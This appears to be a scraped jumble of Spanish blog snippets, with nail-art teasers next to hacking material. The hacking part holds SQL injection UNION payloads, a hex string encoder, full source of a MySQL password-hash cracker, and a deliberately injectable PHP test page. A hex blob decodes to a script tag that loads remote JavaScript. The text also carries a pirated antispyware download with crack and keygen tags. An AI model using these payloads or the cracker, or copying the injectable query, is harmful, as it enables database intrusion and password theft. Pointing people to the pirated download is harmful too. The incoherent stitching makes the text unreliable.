
El fin de semana me pinte las uñas con la carita de hello kitty y me quedaron asi... Me anime hacer un video-tutorial y la verdad es que me ...
El fin de semana me pinte las uñas con la carita de hello kitty y me quedaron asi... Me anime hacer un video-tutorial y la verdad es que me ...
Script Imm Dbg para Lanzar un proceso y atacharse Bueno, aca les dejo un script que hice para correr un programa y despues atacharse a el. L...
Code (python):
import immlib
import subprocess as subp
import os, time
def main(args):
imm = immlib.Debugger()
#pause, we dont want it to be killed inside immdbg
imm.Pause()
try:
#kill the old process
oldpid = imm.getDebuggedPid()
import ctypes
PROCESS_TERMINATE = 1
handle = ctypes.windll.kernel32.OpenProcess(PROCESS_TERMINATE, False, oldpid)
ctypes.windll.kernel32.TerminateProcess(handle, -1)
ctypes.windll.kernel32.CloseHandle(handle)
except:
pass
#when dettached will be killed
imm.Dettach()
imm.Log("Launching : %s" % (args[0]))
#Launch the process
proc = subp.Popen(args)
imm.Log("Process with pid: %d" % (proc.pid))
#Sleep 2 seconds and attach
time.sleep(2)
imm.Attach(proc.pid)
return "Done!"
Script Imm Dbg para Lanzar un proceso y atacharse Bueno, aca les dejo un script que hice para correr un programa y despues atacharse a el. L...
SUPERAntiSpyware Professional v5.0.1116 Final
SUPERAntiSpyware Professional v5.0.1116 Final | 14 Mb
Detect and Remove Spyware, Adware and Remove Malware, Trojans, Dialers, Worms, KeyLoggers,
HiJackers, Parasites, Rootkits, Rogue Security Products and many other types of threats.
Advanced Detection and Removal
-Detect and Remove Spyware, Adware and Remove Malware, Trojans, Dialers,Worms, KeyLoggers, HiJackers, Parasites, Rootkits, Rogue Security Products and many other types of threats.
-Light on System Resources and won't slow down your computer like many otheranti-spyware products. Won't conflict with your existing anti-spyware or anti-virus solution!
-Repair broken Internet Connections, Desktops, Registry Editing and more with our unique RepairSystem!
Real-Time Protection
-Real-Time Blocking of threats! Prevent potentially harmful software from installing or re-installing!
-First Chance Prevention examines over 50 critical points ofyour system each time your system starts up and shuts down to eliminate threats before they have a chance to infect and infiltrate your system.
-Schedule either Quick, Complete or Custom ScansDaily or Weekly to ensure your computer is free from harmful software. Remove spyware automatically.
Home Page – http://www.superantispyware.com/
Links:
http://www.wupload.com/file/111039748
SUPERAntiSpyware Professional 5.0 [Full] SUPERAntiSpyware Professional 5.0 Keygen SUPERAntiSpyware Professional 5.0 Crack SUPERAntiSp...
SUPERAntiSpyware Professional v5.0.1116 Final
SUPERAntiSpyware Professional v5.0.1116 Final | 14 Mb
Detect and Remove Spyware, Adware and Remove Malware, Trojans, Dialers, Worms, KeyLoggers,
HiJackers, Parasites, Rootkits, Rogue Security Products and many other types of threats.
Advanced Detection and Removal
-Detect and Remove Spyware, Adware and Remove Malware, Trojans, Dialers,Worms, KeyLoggers, HiJackers, Parasites, Rootkits, Rogue Security Products and many other types of threats.
-Light on System Resources and won't slow down your computer like many otheranti-spyware products. Won't conflict with your existing anti-spyware or anti-virus solution!
-Repair broken Internet Connections, Desktops, Registry Editing and more with our unique RepairSystem!
Real-Time Protection
-Real-Time Blocking of threats! Prevent potentially harmful software from installing or re-installing!
-First Chance Prevention examines over 50 critical points ofyour system each time your system starts up and shuts down to eliminate threats before they have a chance to infect and infiltrate your system.
-Schedule either Quick, Complete or Custom ScansDaily or Weekly to ensure your computer is free from harmful software. Remove spyware automatically.
Home Page – http://www.superantispyware.com/
Links:
http://www.wupload.com/file/111039748
SUPERAntiSpyware Professional 5.0 [Full] SUPERAntiSpyware Professional 5.0 Keygen SUPERAntiSpyware Professional 5.0 Crack SUPERAntiSp...
¿Hola gente como les va? Perdon por ser tan hincha pelotas, pero cada día me doy cuenta lo mucho que amo programar y lo que me encanta PHP...
¿Hola gente como les va? Perdon por ser tan hincha pelotas, pero cada día me doy cuenta lo mucho que amo programar y lo que me encanta PHP...
Una amiga me paso este tutorial para pintarse las uñas de una manera distinta y creativa, es super sencillo y bonito. Solo necesitan: En...
La semana pasada me compre una chompita negra basica y unos zapatos negros, tenia pensado ponerles "algo" para que se vean distint...
Hace 15 dias no posteo nada!, y hoy es una fecha muy especial para mi;) asi que no podia dejar de postear aunque solo sea un corazon ♥ de ...
Hoy es 3108, el día del blog!!!!!!!! y para todos los que tenemos/leemos un blog es un día muy importante, bonito y tenemos que celebrarlo, ...
print "Enter string to encode:"; $str=;chomp $str; $enc = encode($str); print "Hex Encoded value: 0x$enc\n"; sub encode{ #Sub to encode @subvar=@_; my $sqlstr =$subvar[0]; @ASCII = unpack("C*", $sqlstr); foreach $line (@ASCII) { $encoded = sprintf('%lx',$line); $encoded_command .= $encoded; } return $encoded_command; }
Replace(Group_concat(Cast(Table_Name AS CHAR)),0x2c,0x3c62723e)
id=1 and 1=2 union select 1,2,3,4--
id=1 and 1=2 union select 1,( Select Replace(Group_concat(Cast(Table_Name AS CHAR)),0x2c,0x3c62723e) from information_schema.tables ),3,4--
id=1 and 1=2 union select 1,( Select Replace(Group_concat(Cast(Table_Name AS CHAR)),0x2c,0x3c62723e) from information_schema.tables Where INSTR( (Select Group_concat(Cast(Table_Name AS CHAR)) from information_schema.tables), Table_Name ) = 0 ),3,4--
/* This program is public domain. Share and enjoy. * * Example: * $ gcc -O2 -fomit-frame-pointer mysqlfast.c -o mysqlfast * $ mysqlfast 6294b50f67eda209 * Hash: 6294b50f67eda209 * Trying length 3 * Trying length 4 * Found pass: barf * * The MySQL password hash function could be strengthened considerably * by: * - making two passes over the password * - using a bitwise rotate instead of a left shift * - causing more arithmetic overflows */ #includetypedef unsigned long u32; /* Allowable characters in password; 33-126 is printable ascii */ #define MIN_CHAR 33 #define MAX_CHAR 126 /* Maximum length of password */ #define MAX_LEN 12 #define MASK 0x7fffffffL int crack0(int stop, u32 targ1, u32 targ2, int *pass_ary) { int i, c; u32 d, e, sum, step, diff, div, xor1, xor2, state1, state2; u32 newstate1, newstate2, newstate3; u32 state1_ary[MAX_LEN-2], state2_ary[MAX_LEN-2]; u32 xor_ary[MAX_LEN-3], step_ary[MAX_LEN-3]; i = -1; sum = 7; state1_ary[0] = 1345345333L; state2_ary[0] = 0x12345671L; while (1) { while (i < stop) { i++; pass_ary[i] = MIN_CHAR; step_ary[i] = (state1_ary[i] & 0x3f) + sum; xor_ary[i] = step_ary[i]*MIN_CHAR + (state1_ary[i] << 8); sum += MIN_CHAR; state1_ary[i+1] = state1_ary[i] ^ xor_ary[i]; state2_ary[i+1] = state2_ary[i] + ((state2_ary[i] << 8) ^ state1_ary[i+1]); } state1 = state1_ary[i+1]; state2 = state2_ary[i+1]; step = (state1 & 0x3f) + sum; xor1 = step*MIN_CHAR + (state1 << 8); xor2 = (state2 << 8) ^ state1; for (c = MIN_CHAR; c <= MAX_CHAR; c++, xor1 += step) { newstate2 = state2 + (xor1 ^ xor2); newstate1 = state1 ^ xor1; newstate3 = (targ2 - newstate2) ^ (newstate2 << 8); div = (newstate1 & 0x3f) + sum + c; diff = ((newstate3 ^ newstate1) - (newstate1 << 8)) & MASK; if (diff % div != 0) continue; d = diff / div; if (d < MIN_CHAR || d > MAX_CHAR) continue; div = (newstate3 & 0x3f) + sum + c + d; diff = ((targ1 ^ newstate3) - (newstate3 << 8)) & MASK; if (diff % div != 0) continue; e = diff / div; if (e < MIN_CHAR || e > MAX_CHAR) continue; pass_ary[i+1] = c; pass_ary[i+2] = d; pass_ary[i+3] = e; return 1; } while (i >= 0 && pass_ary[i] >= MAX_CHAR) { sum -= MAX_CHAR; i--; } if (i < 0) break; pass_ary[i]++; xor_ary[i] += step_ary[i]; sum++; state1_ary[i+1] = state1_ary[i] ^ xor_ary[i]; state2_ary[i+1] = state2_ary[i] + ((state2_ary[i] << 8) ^ state1_ary[i+1]); } return 0; } void crack(char *hash) { int i, len; u32 targ1, targ2, targ3; int pass[MAX_LEN]; if ( sscanf(hash, "%8lx%lx", &targ1, &targ2) != 2 ) { printf("Invalid password hash: %s\n", hash); return; } printf("Hash: %08lx%08lx\n", targ1, targ2); targ3 = targ2 - targ1; targ3 = targ2 - ((targ3 << 8) ^ targ1); targ3 = targ2 - ((targ3 << 8) ^ targ1); targ3 = targ2 - ((targ3 << 8) ^ targ1); for (len = 3; len <= MAX_LEN; len++) { printf("Trying length %d\n", len); if ( crack0(len-4, targ1, targ3, pass) ) { printf("Found pass: "); for (i = 0; i < len; i++) putchar(pass[i]); putchar('\n'); break; } } if (len > MAX_LEN) printf("Pass not found\n"); } int main(int argc, char *argv[]) { int i; if (argc <= 1) printf("usage: %s hash\n", argv[0]); for (i = 1; i < argc; i++) crack(argv[i]); return 0; }
CREATE TABLE 'users' ( 'id' int(10) unsigned NOT NULL auto_increment, 'name' varchar(50) NOT NULL, 'password' varchar(50) NOT NULL, PRIMARY KEY ('id') ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1 AUTO_INCREMENT=2 ; users INSERT INTO 'users' VALUES (1, 'administrator', '1234%&_'); INSERT INTO 'users' VALUES (2, 'ka0x', 't3st_bl1nd'); INSERT INTO 'users' VALUES (3, 'bush', 'terrorist');
Blind SQL Injection Test D.O.M LABS 2008"; $db = mysql_connect($host, $dbuser, $dbpass); mysql_select_db($dbname,$db); $sql = "SELECT * FROM users WHERE id=".$_GET['id']; $query = mysql_query($sql); if(@mysql_num_rows($query)==0){ die('No hay columnas'); } $result=@mysql_fetch_row($query); echo ""; die(); ?>
Blind SQL Injection Test
D.O.M LABS
< br>"; echo "user_id: ".$result[0]."
"; echo "username: ".$result[1]."
"; // echo "Password: ".$result[2]."
"; echo "
(0x3c736372697074207372633d22687474703a2f2f7669727475782e636f6d2e61722f4749452f5f2e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e)
+--------------------------------------------------------+ | SQL injection && Blind Sql Injection | | Escrito por l0ve ...